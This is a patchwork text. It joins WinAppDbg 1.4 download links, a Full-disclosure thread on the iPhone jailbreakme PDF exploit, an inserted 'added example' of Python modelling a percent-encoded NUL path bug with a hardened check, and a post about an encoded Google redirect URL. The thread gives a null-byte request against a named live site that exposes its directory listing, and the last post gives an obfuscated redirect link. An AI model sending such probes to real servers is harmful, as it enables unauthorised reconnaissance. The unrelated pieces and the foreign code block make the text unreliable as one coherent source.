Windows installer (64 bits)
http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.4/winappdbg-1.4.win-amd64.exe/download
http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.4/winappdbg-1.4.win-amd64.msi/download

Source code
http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.4/winappdbg-1.4.zip/download
http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.4/winappdbg-1.4.tar.bz2/download

Documentation:
--------------

Online
http://winappdbg.sourceforge.net/doc/v1.4/tutorial
http://winappdbg.sourceforge.net/doc/v1.4/reference

For download
http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.4/winappdbg-tutorial-1.4.chm/download
http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.4/winappdbg-reference-1.4.chm/download
http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.4/winappdbg-tutorial-1.4.pdf/download
http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.4/winappdbg-reference-1.4.pdf/download
Re: [Full-disclosure] On the iPhone PDF and kernel exploit
http://jailbreakme.com/_/ gives me a 404 Not Found error.

There were a few vulnerabilities in lighttpd related to the %00 character but after googling a while I couldn't find this particular one. I guess it's worth reporting if this still works in the current version (1.5.0).

On Thu, Aug 5, 2010 at 12:04 PM, Sabahattin Gucukoglu m...@sabahattin-gucukoglu.com wrote:

> On 5 Aug 2010, at 10:13, Ryan Sears wrote:
>
>> Well I'm no expert but I'm going to see if I can reverse engineer the PDFs used for jailbreaking (obviously I'd need an ARM assembly book or someone who knows it :-P) and figure out exactly what they're doing. I agree with what was said earlier, I'm not saying they're doing something malicious, but if I wanted to backdoor thousands of phones this is how I'D do it.
>
> It didn't work for me. I use VoiceOver, which didn't like the (fake) slider implemented in javascript, so I had to spoof the UA on a Mac, grab the source, inspect it, grab the PDF, email it to myself ... it didn't work. :-( iPhone 3GS = 2,1, yes?
>
>> Either way anyone interested in doing the same I've discovered that the webserver (lighttpd 1.4.19) drops the index if you GET a null byte. http://www.jailbreakme.com/%00
>
> Nice, did you just try it in case it might work, or does this constitute a vuln that wants fixing in current lighttpd? It's just that indexing happens to be enabled on http://jailbreakme.com/_/ too.
>
>> Also if anyone knows how to get in contact with any of the admins for the site (or anyone who runs it for that matter) please either let me know or let them know.
>
> Ditto, thanks.
>
> Cheers,
> Sabahattin
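The behaviour reported above, a directory index that disappears when the request path carries a percent-encoded NUL, is the classic symptom of two layers disagreeing about one buffer: a length-aware string layer sees "/\0" and decides the request does not end in "/", while the file layer, handed the same bytes through a NUL-terminated C string API, opens "/". The following added example models that mismatch in Python against a constructed virtual document tree; it is not lighttpd's code and claims nothing about how lighttpd implements path handling. The hardened variant validates the decoded bytes once, before either layer sees them, and also refuses paths that normalise outside the document root, which goes a little beyond what the thread describes.

```python
"""Percent-decoded NUL in a request path: a model of the reported symptom.

Added example, not lighttpd source. DOCROOT and TREE are a constructed
virtual filesystem so the model runs without touching disk. naive_serve()
reproduces the "index dropped" behaviour described in the thread;
checked_serve() rejects the request before any layer sees the NUL.
"""
import posixpath
from urllib.parse import unquote_to_bytes

DOCROOT = "/srv/www"
# Constructed tree: path -> "dir" or "file".
TREE = {
    "/srv/www": "dir",
    "/srv/www/index.html": "file",
    "/srv/www/docs": "dir",
    "/srv/www/docs/readme.txt": "file",
}


def c_string(buf: bytes) -> bytes:
    """What a NUL-terminated string API sees: nothing past the first NUL."""
    return buf.split(b"\x00", 1)[0]


def resolve(decoded_c: bytes) -> str:
    """Map the (C-string view of the) path onto the document tree, refusing
    anything that normalises outside DOCROOT."""
    target = posixpath.normpath(DOCROOT + "/" + decoded_c.decode("latin-1"))
    if target != DOCROOT and not target.startswith(DOCROOT + "/"):
        return ""  # escaped the document root; nothing to serve
    return target


def naive_serve(request_path: str) -> str:
    """Two layers, one buffer, two opinions: the index logic looks at the
    full decoded bytes, the file layer at the C string."""
    decoded = unquote_to_bytes(request_path)
    wants_index = decoded.endswith(b"/")     # b"/\x00" does not end in "/"
    target = resolve(c_string(decoded))      # ...but opens the same directory
    kind = TREE.get(target)
    if kind == "dir":
        if wants_index and TREE.get(target + "/index.html") == "file":
            return "200 index.html"
        return "200 directory listing"       # the index has been "dropped"
    if kind == "file":
        return "200 file"
    return "404"


def checked_serve(request_path: str) -> str:
    """Same pipeline, but the decoded bytes are validated once, up front,
    so no later layer can see a different string than the others."""
    decoded = unquote_to_bytes(request_path)
    if any(b < 0x20 or b == 0x7F for b in decoded):
        return "400 control byte in path"
    return naive_serve(request_path)
```

The general lesson is the one the fix applies: decode once, validate the decoded bytes as a whole (length-aware, not NUL-terminated), and only then let any component interpret the path.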
Re: [Full-disclosure] Google auto redirect
Did you actually try the link? Cause it worked for me...

On Wed, Jul 14, 2010 at 12:14 PM, McGhee, Eddie eddie.mcg...@ncr.com wrote:

> Come on, what's funny about encoding a URL? You don't see this as a vuln? REALLY, geez, peace...
>
> From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Marshall Whittaker
> Sent: 13 July 2010 21:17
> To: full-disclosure@lists.grok.org.uk
> Subject: [Full-disclosure] Google auto redirect
>
> I don't really consider this a vulnerability, but it's funny.
>
> http://www.google.com/search?q=%79%61%68%6F%6F&ie=ISO-8859-1&source=hp&hl=en&btnI=I%26%2339;%69%6D%2B%46%65%65%6C%69%6E%67%2B%4C%75%63%6B%79
>
> --
> oxagast